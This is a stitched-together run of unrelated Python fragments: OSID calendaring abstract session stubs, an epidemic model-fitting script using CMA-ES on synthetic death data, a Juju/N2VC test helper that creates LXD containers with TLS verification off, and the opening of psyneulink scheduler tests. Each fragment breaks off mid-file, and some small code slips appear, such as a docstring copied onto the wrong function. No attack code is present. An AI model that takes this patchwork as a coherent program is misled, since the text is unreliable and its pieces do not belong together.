@abc.abstractmethod
def get_offset_events_by_search(self, offset_event_query, offset_event_search):
"""Gets the search results matching the given search query using the given search.
:param offset_event_query: the offset event search query
:type offset_event_query: ``osid.calendaring.OffsetEventQuery``
:param offset_event_search: the offset event search
:type offset_event_search: ``osid.calendaring.OffsetEventSearch``
:return: the returned search results
:rtype: ``osid.calendaring.OffsetEventSearchResults``
:raise: ``NullArgument`` -- ``offset_event_query`` or ``offset_event_search`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
:raise: ``Unsupported`` -- ``offset_event_query`` is not of this service
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventSearchResults
@abc.abstractmethod
def get_offset_event_query_from_inspector(self, offset_event_query_inspector):
"""Gets an offset event query from an inspector.
The inspector is available from an ``OffsetEventSearchResults``.
:param offset_event_query_inspector: an offset event query inspector
:type offset_event_query_inspector: ``osid.calendaring.OffsetEventQueryInspector``
:return: the offset event query
:rtype: ``osid.calendaring.OffsetEventQuery``
:raise: ``NullArgument`` -- ``offset_event_query_inspector`` is ``null``
:raise: ``Unsupported`` -- ``offset_event_query_inspector`` is not of this service
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventQuery
class OffsetEventAdminSession:
"""This session creates, updates, and deletes ``Offset Events``.
The data for create and update is provided by the consumer via the
form object. ``OsidForms`` are requested for each create or update
and may not be reused.
Create and update operations differ in their usage. To create an
``OffsetEvent,`` an ``OffsetEventForm`` is requested using
``get_offset_event_form_for_create()`` specifying the desired record
``Types`` or none if no record ``Types`` are needed. The returned
``OffsetEventForm`` will indicate that it is to be used with a
create operation and can be used to examine metadata or validate data
prior to creation. Once the ``OffsetEventForm`` is submitted to a
create operation, it cannot be reused with another create operation
unless the first operation was unsuccessful. Each
``OffsetEventForm`` corresponds to an attempted transaction.
For updates, ``OffsetEventForms`` are requested for the
``OffsetEvent`` ``Id`` that is to be updated using
``getOffsetEventFormForUpdate()``. Similarly, the ``OffsetEventForm``
has metadata about the data that can be updated and it can perform
validation before submitting the update. The ``OffsetEventForm`` can
only be used once for a successful update and cannot be reused.
The delete operations delete ``Offset Events``. To unmap an
``OffsetEvent`` from the current ``Calendar,`` the
``OffsetEventCalendarAssignmentSession`` should be used. These delete
operations attempt to remove the ``OffsetEvent`` itself thus
removing it from all known ``Calendar`` catalogs.
This session includes an ``Id`` aliasing mechanism to assign an
external ``Id`` to an internally assigned Id.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_calendar_id(self):
"""Gets the ``Calendar`` ``Id`` associated with this session.
:return: the ``Calendar Id`` associated with this session
:rtype: ``osid.id.Id``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.id.Id
calendar_id = property(fget=get_calendar_id)
@abc.abstractmethod
def get_calendar(self):
"""Gets the ``Calendar`` associated with this session.
:return: the ``Calendar`` associated with this session
:rtype: ``osid.calendaring.Calendar``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.Calendar
calendar = property(fget=get_calendar)
@abc.abstractmethod
def can_create_offset_events(self):
"""Tests if this user can create ``OffsetEvents``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known creating an
``OffsetEvent`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
create operations to an unauthorized user.
:return: ``false`` if ``OffsetEvent`` creation is not authorized, ``true`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
S_s, I_s, Inew_s, R_s, D_s = solve_SIR_difference_equations(p, p_dict_SIR, travel_data)
rho_SIR = p_dict_SIR.get('rho', p.rho)
Iinit_SIR = p_dict_SIR.get('Iinit1', p.Iinit1)
theta_fit_SIR = p_dict_SIR.get('theta',theta_SIR)
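# Reproduction numbers implied by the fitted SIR parameters: R_0 = rho * beta / theta at
# full mobility (alpha = 1), and R_eff(t) rescales R_0 by the mobility factor alpha(t)
# and the susceptible fraction S(t) / N.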
R_0_s = (rho_SIR * p.beta * 1) / theta_fit_SIR
R_eff_s = ((rho_SIR * p.beta * alpha_SIR) / theta_fit_SIR) * (S_s / p.N)
## Optimization for the SIR-deltaD model
print('SIR-DeltaD model fitting.')
# Optimize only rho and Iinit:
print('------- SIR-DeltaD: Fitting -----------')
# Define theta
p.beta = beta_SIR
p.DeltaD = DeltaD_SIR
p.theta = theta_SIR
parametersSIRDeltaD, scoresSIRDeltaD, stddevSIRDeltaD = [], [], []
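# Multi-start strategy: each repeat draws a random starting point uniformly within the
# parameter bounds, runs CMA-ES to convergence, and the runs are ranked afterwards by
# their final objective value so that only the best fit is kept.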
for i in range(repeats):
print('SIR DeltaD' + Fitparams + ' fitting Repeat: ' + str(i + 1))
optsSIRDeltaD = cma.CMAOptions()
optsSIRDeltaD.set("bounds", bounds_SIRDeltaD)
optsSIRDeltaD.set("CMA_stds", stds_SIRDeltaD)
x0_SIRDeltaD = np.random.uniform(bounds_SIRDeltaD[0][0], bounds_SIRDeltaD[1][0])
for j in range(len(bounds_SIRDeltaD[0])-1):
x0_SIRDeltaD = np.append(x0_SIRDeltaD, np.random.uniform(bounds_SIRDeltaD[0][j+1], bounds_SIRDeltaD[1][j+1]))
print(x0_SIRDeltaD)
es = cma.fmin(NBlike_SIR, x0_SIRDeltaD, sigma0=1, args=(p, parameters_to_optimise_SIRDeltaD, data_D, travel_data), options = optsSIRDeltaD)
parametersSIRDeltaD.append(es[0])
scoresSIRDeltaD.append(es[1])
stddevSIRDeltaD.append(es[6])
# Sort according to smallest function score
# SIR-DeltaD
orderSIRDeltaD = np.argsort(scoresSIRDeltaD)
scoresSIRDeltaD = np.asarray(scoresSIRDeltaD)[orderSIRDeltaD]
parametersSIRDeltaD = np.asarray(parametersSIRDeltaD)[orderSIRDeltaD]
stddevSIRDeltaD = np.asarray(stddevSIRDeltaD)[orderSIRDeltaD]
# Extract best
obtained_parameters_SIRDeltaD = parametersSIRDeltaD[0]
obtained_stdev_SIRDeltaD = stddevSIRDeltaD[0]
# Store SIR-DeltaD results
print('Storing default fit SIR-DeltaD model best result...')
with open(filename_SIRDeltaD + '.txt', 'w') as f:
for x in obtained_parameters_SIRDeltaD:
f.write(pints.strfloat(x) + '\n')
print('Storing default fit SIR-DeltaD model errors...')
with open(filename_SIRDeltaD + '-errors.txt', 'w') as f:
for score in scoresSIRDeltaD:
f.write(pints.strfloat(-score) + '\n')
# Store simulations for plotting
p_dict_SIRDeltaD = dict(zip(parameters_to_optimise_SIRDeltaD, obtained_parameters_SIRDeltaD))
# update params:
if p.square_lockdown:
alpha_SIRDeltaD = step(p, lgoog_data = p.maxtime + 1 - p.numeric_max_age, parameters_dictionary = p_dict_SIRDeltaD)
alpha_SIRDeltaD = alpha_SIRDeltaD[:-p.extra_days_to_simulate]
else:
alpha_SIRDeltaD = np.ones(p.maxtime+1)
label_SIRDeltaD = ''
for l in p_dict_SIRDeltaD:
label_SIRDeltaD = label_SIRDeltaD + str(l) + ': ' + str('%.4g' % p_dict_SIRDeltaD.get(l)) + '\n'
S_sD, I_sD, Inew_sD, R_sD, D_sD = solve_SIR_difference_equations(p, p_dict_SIRDeltaD, travel_data)
rho_SIRDeltaD = p_dict_SIRDeltaD.get('rho', p.rho)
Iinit_SIRDeltaD = p_dict_SIRDeltaD.get('Iinit1', p.Iinit1)
theta_fit_SIRDeltaD = p_dict_SIRDeltaD.get('theta',theta_SIR)
R_0_sD = (rho_SIRDeltaD * p.beta * 1) / theta_fit_SIRDeltaD
R_eff_sD = ((rho_SIRDeltaD * p.beta * alpha_SIRDeltaD) / theta_fit_SIRDeltaD) * (S_sD / p.N)
## Optimization for the SINR model
print('SIUR model fitting.')
# Optimize only rho and Iinit:
print('------- SIUR: Fitting rho and Iinit -----------')
# Define theta and xi
p.theta = theta_SINR
p.xi = xi_SINR
parametersSINR, scoresSINR, stddevSINR = [], [], []
for i in range(repeats):
print('SIUR' + Fitparams + ' fitting Repeat: ' + str(i + 1))
optsSINR = cma.CMAOptions()
optsSINR.set("bounds", bounds_SINR)
optsSINR.set("CMA_stds", stds_SINR)
x0_SINR = np.random.uniform(bounds_SINR[0][0], bounds_SINR[1][0])
for j in range(len(bounds_SINR[0])-1):
x0_SINR = np.append(x0_SINR, np.random.uniform(bounds_SINR[0][j+1], bounds_SINR[1][j+1]))
print(x0_SINR)
es = cma.fmin(NBlike_SINR, x0_SINR, sigma0=1, args=(p, parameters_to_optimise_SINR, data_D, travel_data), options=optsSINR)
parametersSINR.append(es[0])
scoresSINR.append(es[1])
stddevSINR.append(es[6])
# Sort according to smallest function score
# SINR
orderSINR = np.argsort(scoresSINR)
scoresSINR = np.asarray(scoresSINR)[orderSINR]
parametersSINR = np.asarray(parametersSINR)[orderSINR]
stddevSINR = np.asarray(stddevSINR)[orderSINR]
# Extract best
obtained_parameters_SINR = parametersSINR[0]
obtained_stdev_SINR = stddevSINR[0]
# Store SINR results
print('Storing default fit SINR model best result...')
with open(filename_SINR + '.txt', 'w') as f:
for x in obtained_parameters_SINR:
f.write(pints.strfloat(x) + '\n')
print('Storing default fit SINR model errors...')
with open(filename_SINR + '-errors.txt', 'w') as f:
for score in scoresSINR:
f.write(pints.strfloat(-score) + '\n')
# Simulations for plots:
p_dict_SINR = dict(zip(parameters_to_optimise_SINR, obtained_parameters_SINR))
label_SINR = ''
for l in p_dict_SINR:
label_SINR = label_SINR + str(l) + ': ' + str('%.4g' % p_dict_SINR.get(l)) + '\n'
S_u, I_u, Inew_u, N_u, R_u, D_u = solve_SIUR_difference_equations(p, p_dict_SINR, travel_data)
if p.square_lockdown:
alpha_SINR = step(p, lgoog_data = p.maxtime + 1 - p.numeric_max_age, parameters_dictionary = p_dict_SINR)
else:
alpha_SINR = np.ones(p.maxtime + 1 + p.extra_days_to_simulate)
rho_SINR = p_dict_SINR.get('rho', p.rho)
Iinit_SINR = p_dict_SINR.get('Iinit1', p.Iinit1)
theta_fit_SINR = p_dict_SINR.get('theta',theta_SINR)
R_0_u = (rho_SINR * p.beta * 1) / theta_fit_SINR
R_eff_u = ((rho_SINR * p.beta * alpha_SINR[:-p.extra_days_to_simulate]) / theta_fit_SINR) * (S_u / p.N)
# If Age fit required:
if FitAge:
print('Fitting SItR model')
parameters_to_optimise = ['rho', 'Iinit1', 'negative_binomial_phi']
toy_values = [3, 1000, .001]
filename_AGE = os.path.join(folder_path, get_file_name_suffix(p, 'syntheticSItRD-'+str(SyntDataNum_file), Noise_flag+'-maxtime-' + str(maxtime_fit), parameters_to_optimise))
bounds_SItR = [[ rho_lower, Iinit1_lower, negative_binomial_phi_lower], [ rho_upper, Iinit1_upper, negative_binomial_phi_upper]]
stds_SItR = [1e-1, 100, 1e-2]
if FitStep:
parameters_to_optimise.extend(['lockdown_baseline', 'lockdown_offset'])
bounds_SItR[0].extend([lockdown_baseline_lower, lockdown_offset_lower])
bounds_SItR[1].extend([lockdown_baseline_upper, lockdown_offset_upper])
toy_values.extend([p.lockdown_baseline, p.lockdown_offset])
stds_SItR.extend([1e-2, 10])
print('Age model fitting using negative binomial likelihood.')
# Set up optimisation
print('Selected data source: ' + 'simulatedAGE')
print('Storing results to: ' + filename_AGE + '.txt')
# Calculate beta, gamma and zeta vector rates.
print('Storing fixed parameters...')
store_rate_vectors(dict(zip(parameters_to_optimise, toy_values)),p)
## Optimization for the Age model
parameters, scores = [], []
# Repeat optimisation multiple times from different initial guesses and pick best
for i in range(min(repeats, 5)):
print('Age model fitting using negative binomial likelihood. Repeat: ' + str(i + 1))
# CMA-ES (covariance matrix adaptation evolution strategy)
opts = cma.CMAOptions()
#opts.set("seed", 100)
opts.set("bounds", bounds_SItR)
opts.set("CMA_stds", stds_SItR)
x0 = np.random.uniform(bounds_SItR[0][0], bounds_SItR[1][0])
for j in range(len(bounds_SItR[0])-1):
x0 = np.append(x0, np.random.uniform(bounds_SItR[0][j+1], bounds_SItR[1][j+1]))
print(x0)
es = cma.fmin(NBlike_SItRD, x0, sigma0=1, args=(p, parameters_to_optimise, travel_data, data_D), options=opts)
parameters.append(es[0])
scores.append(es[1])
# Sort according to smallest function score
order = np.argsort(scores)
scores = np.asarray(scores)[order]
parameters = np.asarray(parameters)[order]
# Show results
print('Age model best parameters:')
print(parameters[0])
print('Age model best score:')
print(-scores[0])
# Extract best
obtained_parameters = parameters[0]
# Store results
print('Storing age model best result...')
with open(filename_AGE + travel_label + str(travel_data) + '.txt', 'w') as f:
for x in obtained_parameters:
f.write(pints.strfloat(x) + '\n')
print('Storing all age model errors...')
with open(filename_AGE + travel_label + str(travel_data) + '-errors.txt', 'w') as f:
for score in scores:
f.write(pints.strfloat(-score) + '\n')
# store simulations for plotting
p_dict_SItRD = dict(zip(parameters_to_optimise, obtained_parameters))
label_SItRD = ''
for l in p_dict_SItRD:
label_SItRD = label_SItRD + str(l) + ': ' + str('%.4g' % p_dict_SItRD.get(l)) + '\n'
store_rate_vectors(p_dict_SItRD,p)
S_a, Iday_a, R_a, D_a, Itot_a = solve_difference_equations(p, p_dict_SItRD, travel_data)
# R0 and Reff
if p.square_lockdown:
p.alpha = step(p, lgoog_data = p.maxtime + 1 - p.numeric_max_age, parameters_dictionary = p_dict_SItRD)
else:
p.alpha = np.ones(p.maxtime + 1 + p.extra_days_to_simulate)
R_eff_a = calculate_R_instantaneous(p, S_a, p_dict_SItRD)
R_0_a = R_eff_a[0]
else:
Iday_a = data_I
Itot_a = data_Itot
S_a = data_S
S_a_long = data_S_long
D_a = data_Dreal
R_a = data_R
p_dict_SItRD = dict(zip(['rho', 'Iinit1','negative_binomial_phi'], [3.203,860,.002])) # Use the true parameters
store_rate_vectors(p_dict_SItRD,p)
if p.square_lockdown:
p.alpha = step(p, lgoog_data = p.maxtime + 1 - p.numeric_max_age, parameters_dictionary = p_dict_SItRD)
else:
p.alpha = np.ones(p.maxtime + 1 + p.extra_days_to_simulate)
print(len(p.Gjoint))
print(len(p.beta))
print(len(S_a))
R_eff_a = calculate_R_instantaneous(p, S_a_long, p_dict_SItRD)
R_0_a = R_eff_a[0]
## PLOTS for SIR and SINR
print('---- Summary ...')
# get the correct theta:
print('Data day of max new infections:')
print(np.argmax(data_I[0,:]))
print('------ Best SIR parameters:------ ')
print(parametersSIR[0])
print('Std Dev:')
print(stddevSIR[0])
print('Best SIR score:')
print(-scoresSIR[0])
print('Total deaths and recoveries:')
print([np.sum(D_s),np.sum(R_s)])
print('R_0, R_eff_min, R_eff_max, t where R_eff_a<1, t of Inew max ')
print([round(R_0_s,2),round(min(R_eff_s),2),round(max(R_eff_s),2), np.where(R_eff_s<1)[0][0], np.argmax(Inew_s[: -(p.numeric_max_age + p.extra_days_to_simulate)])])
print('------ Best SIR-DeltaD parameters:------ ')
print(parametersSIRDeltaD[0])
print('Std Dev:')
print(stddevSIRDeltaD[0])
print('Best SIR-DeltaD score:')
print(-scoresSIRDeltaD[0])
print('Total deaths and recoveries:')
print([np.sum(D_sD),np.sum(R_sD)])
print('R_0, R_eff_min, R_eff_max, t where R_eff_a<1, t of Inew max ')
print([round(R_0_sD,2),round(min(R_eff_sD),2),round(max(R_eff_sD),2), np.where(R_eff_sD<1)[0][0], np.argmax(Inew_sD[: -(p.numeric_max_age + p.extra_days_to_simulate)])])
print('------ Best SINR parameters:------ ')
print(parametersSINR[0])
print('Std Dev:')
print(stddevSINR[0])
print('Best SINR score:')
print(-scoresSINR[0])
print('Day of max new infections:')
print(np.argmax(Inew_u[: -(p.numeric_max_age + p.extra_days_to_simulate)]))
print('Total deaths and recoveries with 2-DF:')
print([np.sum(D_u),np.sum(R_u)])
print('R_0, R_eff_min, R_eff_max, t where R_eff_a<1, t of Inew max ')
print([round(R_0_u,2),round(min(R_eff_u),2),round(max(R_eff_u),2), np.where(R_eff_u<1)[0][0], np.argmax(Inew_u[: -(p.numeric_max_age + p.extra_days_to_simulate)])])
if FitAge:
print('------ Best SItRD parameters:------ ')
print(parameters[0])
print('Best SItRD score:')
print(-scores[0])
print('Total deaths and recoveries with 2-DF:')
print([np.sum(D_a),R_a[-1]])
print('R_0, R_eff_min, R_eff_max, t where R_eff_a<1, t of Inew max ')
print([round(R_0_a,2),round(min(R_eff_a),2),round(max(R_eff_a),2), np.where(R_eff_a<1)[0][0], np.argmax(Iday_a[0,: -(p.numeric_max_age + p.extra_days_to_simulate)])])
# figure with R_eff
print('Plotting ...')
# xticks:
Feb15 = datetime.strptime("15-02-2020", "%d-%m-%Y").date()
date_list = [Feb15 + timedelta(days=x) for x in range(maxtime_fit+1)]
# time
t = np.linspace(0, maxtime_fit-1, maxtime_fit)
fig, (ax2, ax, ax4) = plt.subplots(3, 1, figsize=(8.0, 5.5))
ax.plot(t, Iday_a[0,:maxtime_fit], label = Model2_label)
ax.plot(t, Inew_s[:maxtime_fit], label='SIRD')
ax.plot(t, Inew_sD[:maxtime_fit], label=r'SIRD-$\Delta$D')
ax.plot(t, Inew_u[:maxtime_fit], label='SIURD')
ax.legend()
ax.set_title('Daily new infections')
ax.set_ylabel('Number')
ax.set_xticks([x for x in (0, 80, 160, 240) if x < len(date_list)])
ax.grid(True)
plt.setp(ax.get_xticklabels(), visible=False)
ax2.plot(t[p.day_1st_death_after_150220:], data_D[p.day_1st_death_after_150220:maxtime_fit],'b.', label = 'Synt data')
ax2.plot(t, D_a[:maxtime_fit], label = Model2_label)
ax2.plot(t, D_s[:maxtime_fit], label='SIRD')
ax2.plot(t, D_sD[:maxtime_fit], label=r'SIRD-$\Delta$D')
ax2.plot(t, D_u[:maxtime_fit], label='SIURD')
ax2.legend()
ax2.set_title('Daily deaths')
ax2.set_ylabel('Number')
ax2.set_xticks([x for x in (0, 80, 160, 240) if x < len(date_list)])
ax2.grid(True)
plt.setp(ax2.get_xticklabels(), visible=False)
ax4.plot(R_eff_a[:maxtime_fit] , label = Model2_label + ' R_0 = ' + str( round(R_0_a, 2)))
ax4.plot(R_eff_s[:maxtime_fit], label = 'SIRD R_0 = ' + str(round(R_0_s, 2)))
<filename>tests/base.py
#!/usr/bin/env python3
# Copyright 2019 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import datetime
import logging
import n2vc.vnf
import pylxd
import pytest
import os
import shlex
import subprocess
import time
import uuid
import yaml
from juju.controller import Controller
# Disable InsecureRequestWarning w/LXD
import urllib3
urllib3.disable_warnings()
logging.getLogger("urllib3").setLevel(logging.WARNING)
here = os.path.dirname(os.path.realpath(__file__))
class CleanController():
"""
Context manager that automatically connects and disconnects from
the currently active controller.
Note: Unlike CleanModel, this will not create a new controller for you,
and an active controller must already be available.
"""
def __init__(self):
self._controller = None
async def __aenter__(self):
self._controller = Controller()
await self._controller.connect()
return self._controller
async def __aexit__(self, exc_type, exc, tb):
await self._controller.disconnect()
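# Illustrative usage sketch (assumptions: this is called from an async test and a
# bootstrapped controller is already active; `do_something` is a placeholder, not part
# of this module):
#
#     async def test_something():
#         async with CleanController() as controller:
#             await do_something(controller)
#
# The context manager only handles connect/disconnect; it does not bootstrap or destroy
# the controller itself.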
def debug(msg):
"""Format debug messages in a consistent way."""
now = datetime.datetime.now()
# TODO: Decide on the best way to log. Output from `logging.debug` shows up
# when a test fails, but print() will always show up when running tox with
# `-s`, which is really useful for debugging single tests without having to
# insert a False assert to see the log.
logging.debug(
"[{}] {}".format(now.strftime('%Y-%m-%dT%H:%M:%S'), msg)
)
print(
"[{}] {}".format(now.strftime('%Y-%m-%dT%H:%M:%S'), msg)
)
def get_charm_path():
return "{}/charms".format(here)
def get_layer_path():
return "{}/charms/layers".format(here)
def collect_metrics(application):
"""Invoke Juju's metrics collector.
Caveat: this shells out to the `juju collect-metrics` command, rather than
making an API call. At the time of writing, that API is not exposed through
the client library.
"""
try:
subprocess.check_call(['juju', 'collect-metrics', application])
except subprocess.CalledProcessError as e:
raise Exception("Unable to collect metrics: {}".format(e))
def has_metrics(charm):
"""Check if a charm has metrics defined."""
metricsyaml = "{}/{}/metrics.yaml".format(
get_layer_path(),
charm,
)
if os.path.exists(metricsyaml):
return True
return False
def get_descriptor(descriptor):
desc = None
try:
tmp = yaml.safe_load(descriptor)
# Remove the envelope
root = list(tmp.keys())[0]
if root == "nsd:nsd-catalog":
desc = tmp['nsd:nsd-catalog']['nsd'][0]
elif root == "vnfd:vnfd-catalog":
desc = tmp['vnfd:vnfd-catalog']['vnfd'][0]
except ValueError:
assert False
return desc
def get_n2vc(loop=None):
"""Return an instance of N2VC.VNF."""
log = logging.getLogger()
log.level = logging.DEBUG
# Extract parameters from the environment in order to run our test
vca_host = os.getenv('VCA_HOST', '127.0.0.1')
vca_port = os.getenv('VCA_PORT', 17070)
vca_user = os.getenv('VCA_USER', 'admin')
vca_charms = os.getenv('VCA_CHARMS', None)
vca_secret = os.getenv('VCA_SECRET', None)
vca_cacert = os.getenv('VCA_CACERT', None)
# Get the Juju Public key
juju_public_key = get_juju_public_key()
if juju_public_key:
debug("Reading Juju public key @ {}".format(juju_public_key))
with open(juju_public_key, 'r') as f:
juju_public_key = f.read()
debug("Found public key: {}".format(juju_public_key))
else:
raise Exception("No Juju Public Key found")
# Get the ca-cert
# os.path.expanduser("~/.config/lxc")
# with open("{}/agent.conf".format(AGENT_PATH), "r") as f:
# try:
# y = yaml.safe_load(f)
# self.cacert = y['cacert']
# except yaml.YAMLError as exc:
# log("Unable to find Juju ca-cert.")
# raise exc
client = n2vc.vnf.N2VC(
log=log,
server=vca_host,
port=vca_port,
user=vca_user,
secret=vca_secret,
artifacts=vca_charms,
loop=loop,
juju_public_key=juju_public_key,
ca_cert=vca_cacert,
)
return client
def create_lxd_container(public_key=None, name="test_name"):
"""
Returns a container object
If public_key isn't set, we'll use the Juju ssh key
:param public_key: The public key to inject into the container
:param name: The name of the test being run
"""
container = None
# Format name so it's valid
name = name.replace("_", "-").replace(".", "")
client = get_lxd_client()
if not client:
raise Exception("Unable to connect to LXD")
test_machine = "test-{}-{}".format(
uuid.uuid4().hex[-4:],
name,
)
private_key_path, public_key_path = find_n2vc_ssh_keys()
try:
# create profile w/cloud-init and juju ssh key
if not public_key:
public_key = ""
with open(public_key_path, "r") as f:
public_key = f.readline()
client.profiles.create(
test_machine,
config={
'user.user-data': '#cloud-config\nssh_authorized_keys:\n- {}'.format(public_key)},
devices={
'root': {'path': '/', 'pool': 'default', 'type': 'disk'},
'eth0': {
'nictype': 'bridged',
'parent': 'lxdbr0',
'type': 'nic'
}
}
)
except Exception as ex:
debug("Error creating lxd profile {}: {}".format(test_machine, ex))
raise ex
try:
# create lxc machine
config = {
'name': test_machine,
'source': {
'type': 'image',
'alias': 'xenial',
'mode': 'pull',
'protocol': 'simplestreams',
'server': 'https://cloud-images.ubuntu.com/releases',
},
'profiles': [test_machine],
}
container = client.containers.create(config, wait=True)
container.start(wait=True)
except Exception as ex:
debug("Error creating lxd container {}: {}".format(test_machine, ex))
# This is a test-ending failure.
raise ex
def wait_for_network(container, timeout=30):
"""Wait for eth0 to have an ipv4 address."""
starttime = time.time()
while(time.time() < starttime + timeout):
time.sleep(1)
if 'eth0' in container.state().network:
addresses = container.state().network['eth0']['addresses']
if len(addresses) > 0:
if addresses[0]['family'] == 'inet':
return addresses[0]
return None
try:
wait_for_network(container)
except Exception as ex:
debug(
"Error waiting for container {} network: {}".format(
test_machine,
ex,
)
)
try:
waitcount = 0
while waitcount <= 5:
if is_sshd_running(container):
break
waitcount += 1
time.sleep(1)
if waitcount >= 5:
debug("couldn't detect sshd running")
raise Exception("Unable to verify container sshd")
except Exception as ex:
debug(
"Error checking sshd status on {}: {}".format(
test_machine,
ex,
)
)
# HACK: We need to give sshd a chance to bind to the interface,
# and pylxd's container.execute seems to be broken and fails and/or
# hangs trying to properly check if the service is up.
(exit_code, stdout, stderr) = container.execute([
'ping',
'-c', '5', # Wait for 5 ECHO_REPLY
'8.8.8.8', # Ping Google's public DNS
'-W', '15', # Set a 15 second deadline
])
if exit_code > 0:
# The network failed
raise Exception("Unable to verify container network")
return container
def is_sshd_running(container):
"""Check if sshd is running in the container.
Check to see if the sshd process is running and listening on port 22.
:param container: The container to check
:return boolean: True if sshd is running.
"""
debug("Container: {}".format(container))
try:
(rc, stdout, stderr) = container.execute(
["service", "ssh", "status"]
)
# If the status is a) found and b) running, the exit code will be 0
if rc == 0:
return True
except Exception as ex:
debug("Failed to check sshd service status: {}".format(ex))
return False
def destroy_lxd_container(container):
"""Stop and delete a LXD container.
Sometimes we see errors talking to LXD -- ephemeral issues like
load or a bug that's killed the API. We'll do our best to clean
up here, and we should run a cleanup after all tests are finished
to remove any extra containers and profiles belonging to us.
"""
if type(container) is bool:
return
name = container.name
debug("Destroying container {}".format(name))
client = get_lxd_client()
def wait_for_stop(timeout=30):
"""Wait for eth0 to have an ipv4 address."""
starttime = time.time()
while(time.time() < starttime + timeout):
time.sleep(1)
if container.state == "Stopped":
return
def wait_for_delete(timeout=30):
starttime = time.time()
while(time.time() < starttime + timeout):
time.sleep(1)
if client.containers.exists(name) is False:
return
try:
container.stop(wait=False)
wait_for_stop()
except Exception as ex:
debug(
"Error stopping container {}: {}".format(
name,
ex,
)
)
try:
container.delete(wait=False)
wait_for_delete()
except Exception as ex:
debug(
"Error deleting container {}: {}".format(
name,
ex,
)
)
try:
# Delete the profile created for this container
profile = client.profiles.get(name)
if profile:
profile.delete()
except Exception as ex:
debug(
"Error deleting profile {}: {}".format(
name,
ex,
)
)
def find_lxd_config():
"""Find the LXD configuration directory."""
paths = []
paths.append(os.path.expanduser("~/.config/lxc"))
paths.append(os.path.expanduser("~/snap/lxd/current/.config/lxc"))
for path in paths:
if os.path.exists(path):
crt = os.path.expanduser("{}/client.crt".format(path))
key = os.path.expanduser("{}/client.key".format(path))
if os.path.exists(crt) and os.path.exists(key):
return (crt, key)
return (None, None)
def find_n2vc_ssh_keys():
"""Find the N2VC ssh keys."""
paths = []
paths.append(os.path.expanduser("~/.ssh/"))
for path in paths:
if os.path.exists(path):
private = os.path.expanduser("{}/id_n2vc_rsa".format(path))
public = os.path.expanduser("{}/id_n2vc_rsa.pub".format(path))
if os.path.exists(private) and os.path.exists(public):
return (private, public)
return (None, None)
def find_juju_ssh_keys():
"""Find the Juju ssh keys."""
paths = []
paths.append(os.path.expanduser("~/.local/share/juju/ssh"))
for path in paths:
if os.path.exists(path):
private = os.path.expanduser("{}/juju_id_rsa".format(path))
public = os.path.expanduser("{}/juju_id_rsa.pub".format(path))
if os.path.exists(private) and os.path.exists(public):
return (private, public)
return (None, None)
def get_juju_private_key():
keys = find_juju_ssh_keys()
return keys[0]
def get_juju_public_key():
"""Find the Juju public key."""
paths = []
if 'VCA_PATH' in os.environ:
paths.append("{}/ssh".format(os.environ["VCA_PATH"]))
paths.append(os.path.expanduser("~/.local/share/juju/ssh"))
paths.append("/root/.local/share/juju/ssh")
for path in paths:
if os.path.exists(path):
public = os.path.expanduser("{}/juju_id_rsa.pub".format(path))
if os.path.exists(public):
return public
return None
def get_lxd_client(host=None, port="8443", verify=False):
""" Get the LXD client."""
if host is None:
if 'LXD_HOST' in os.environ:
host = os.environ['LXD_HOST']
else:
host = '127.0.0.1'
passwd = None
if 'LXD_SECRET' in os.environ:
passwd = os.environ['LXD_SECRET']
# debug("Connecting to LXD remote {} w/authentication ({})".format(
# host,
<reponame>kmantel/graph-scheduler
import logging
import graph_scheduler
import pytest
from psyneulink import _unit_registry
from psyneulink.core.components.functions.nonstateful.transferfunctions import Linear
from psyneulink.core.components.mechanisms.processing.transfermechanism import TransferMechanism
from psyneulink.core.components.projections.pathway.mappingprojection import MappingProjection
from psyneulink.core.compositions.composition import Composition
from psyneulink.core.scheduling.condition import (
AfterCall, AfterNCalls, AfterNCallsCombined, AfterNPasses, AfterNEnvironmentStateUpdates,
AfterPass, AfterEnvironmentStateUpdate, All, AllHaveRun, Always, Any, AtPass, AtConsiderationSetExecution,
AtEnvironmentStateUpdate, AtEnvironmentStateUpdateStart, BeforeNCalls, BeforePass, BeforeConsiderationSetExecution,
BeforeEnvironmentStateUpdate, Condition, ConditionError, EveryNCalls, EveryNPasses, Not,
NWhen, TimeInterval, TimeTermination, WhenFinished, WhenFinishedAll,
WhenFinishedAny, WhileNot,
)
from psyneulink.core.scheduling.scheduler import Scheduler
from psyneulink.core.scheduling.time import TimeScale
logger = logging.getLogger(__name__)
class TestCondition:
def test_invalid_input_WhenFinished(self):
with pytest.raises(ConditionError):
WhenFinished(None).is_satisfied()
def test_invalid_input_WhenFinishedAny_1(self):
with pytest.raises(ConditionError):
WhenFinished(None).is_satisfied()
def test_invalid_input_WhenFinishedAny_2(self):
with pytest.raises(ConditionError):
WhenFinished({None}).is_satisfied()
def test_invalid_input_WhenFinishedAll_1(self):
with pytest.raises(ConditionError):
WhenFinished(None).is_satisfied()
def test_invalid_input_WhenFinishedAll_2(self):
with pytest.raises(ConditionError):
WhenFinished({None}).is_satisfied()
def test_additional_args(self):
class OneSatisfied(Condition):
def __init__(self, a):
def func(a, b):
return a or b
super().__init__(func, a)
cond = OneSatisfied(True)
assert cond.is_satisfied(True)
assert cond.is_satisfied(False)
cond = OneSatisfied(False)
assert cond.is_satisfied(True)
assert not cond.is_satisfied(False)
def test_additional_kwargs(self):
class OneSatisfied(Condition):
def __init__(self, a, c=True):
def func(a, b, c=True):
return a or b or c
super().__init__(func, a, c=True)
